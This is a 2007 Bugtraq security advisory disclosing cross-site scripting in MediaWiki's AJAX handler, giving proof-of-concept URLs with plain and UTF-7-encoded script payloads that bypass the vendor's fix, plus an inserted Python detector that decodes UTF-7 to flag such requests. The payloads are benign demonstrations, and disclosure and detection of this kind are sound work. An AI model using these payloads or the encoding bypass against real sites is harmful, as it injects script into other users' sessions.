MediaWiki Cross-site Scripting
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: MediaWiki Cross-site Scripting
- From: eyal@xxxxxxxxxx
- Date: 20 Feb 2007 04:29:01 -0000
MediaWiki Cross-site Scripting Vulnerabilities.

Date: 18/02/2007
Vendor: MediaWiki
Vulnerable versions: MediaWiki 1.9.2 (latest) and below.
Description:
MediaWiki v1.8.2 and below are vulnerable to a plain Cross-site scripting attack
by exploiting the experimental AJAX features, if enabled (default). This XSS was
fixed in post-1.8.2 versions (1.8.3, 1.9.0rc2, 1.9.0, 1.9.1, 1.9.2). This fix
can be bypassed by encoding the XSS exploit in UTF-7. Note: the browser's encoding
auto-detection has to be enabled for successful exploitation.
Proof-of-concept:
http://[Host]/wiki/index.php?action=ajax&rs=[XSS]
UTF-7 XSS in post 1.8.2 versions.
Examples:
v1.8.2 and below:
http://[Host]/wiki/index.php?action=ajax&rs=%3Cscript%3Ewindow.open('http://www.bugsec.com')%3C/script%3E
v1.8.3 - v1.9.2:
http://[Host]/wiki/index.php?action=ajax&rs=+ADw-SCRIPT+AD4-window.open('http://www.bugsec.com');+ADw-/SCRIPT+AD4-
http://[Host]/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49%50%54%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53%43%52%49%50%54%2B%41%44%34%2D
(URL Encoded)
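How a defender can spot the bypass this advisory describes, as an added example (not code from the advisory or from MediaWiki): the detector percent-decodes and then UTF-7-decodes the `rs` parameter before matching, and shows why a fix that only escapes '<' and '>' leaves the encoded form untouched. The `SCRIPT_TAG` pattern, the `exampleFunction` name and the sample request lines are constructed for this example.

```python
"""Added example, not from the advisory or MediaWiki: detector for the UTF-7
bypass.  A UTF-7 payload has no literal '<' or '>' ('+ADw-'/'+AD4-' stand for
them), so a fix that only escapes those characters passes it through; a scanner
must percent-decode and then UTF-7-decode the parameter before matching."""
import html
import re
from urllib.parse import unquote, urlsplit

SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)
UTF7_SHIFT = re.compile(r"\+[A-Za-z0-9+/]*-")

def query_params(url: str) -> dict[str, str]:
    """Split the query string, keeping a literal '+' (parse_qs would turn it
    into a space and hide the very character that opens a UTF-7 shift)."""
    params = {}
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key:
            params[unquote(key)] = unquote(value)
    return params

def normalise(value: str) -> str:
    """Decode UTF-7 shift sequences if any are present, else return as is."""
    if UTF7_SHIFT.search(value):
        try:
            return value.encode("ascii").decode("utf-7")
        except (UnicodeEncodeError, UnicodeDecodeError):
            pass  # not pure ASCII or not valid UTF-7: inspect the raw value
    return value

def escaping_is_noop(value: str) -> bool:
    """True when escaping '&', '<' and '>' leaves `value` unchanged, i.e. the
    escaped response would carry the payload verbatim (the bypass)."""
    return html.escape(value, quote=False) == value

def is_suspicious(url: str) -> bool:
    """Flag action=ajax requests whose normalised `rs` value holds a script tag."""
    params = query_params(url)
    if params.get("action") != "ajax" or "rs" not in params:
        return False
    return SCRIPT_TAG.search(normalise(params["rs"])) is not None

# Constructed request lines modelled on the advisory's PoC URLs, plus a benign call.
SAMPLE_REQUESTS = [
    "/wiki/index.php?action=ajax&rs=%3Cscript%3Ewindow.open('x')%3C/script%3E",
    "/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49%50%54%2B%41%44%34"
    "%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53%43%52%49%50%54"
    "%2B%41%44%34%2D",
    "/wiki/index.php?action=ajax&rs=exampleFunction",  # constructed benign name
]
```

Running `is_suspicious` over `SAMPLE_REQUESTS` flags the first two lines and passes the third; the UTF-7 one is caught only because `normalise` runs before the tag match.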
Credit:
Moshe BA from BugSec
Tel:+972-3-9622655
Email: Info [^A-t] BugSec \*D.O.T*\ com
BugSec LTD. - www.BugSec.com
http://www.bugsec.com/articles.php?Security=24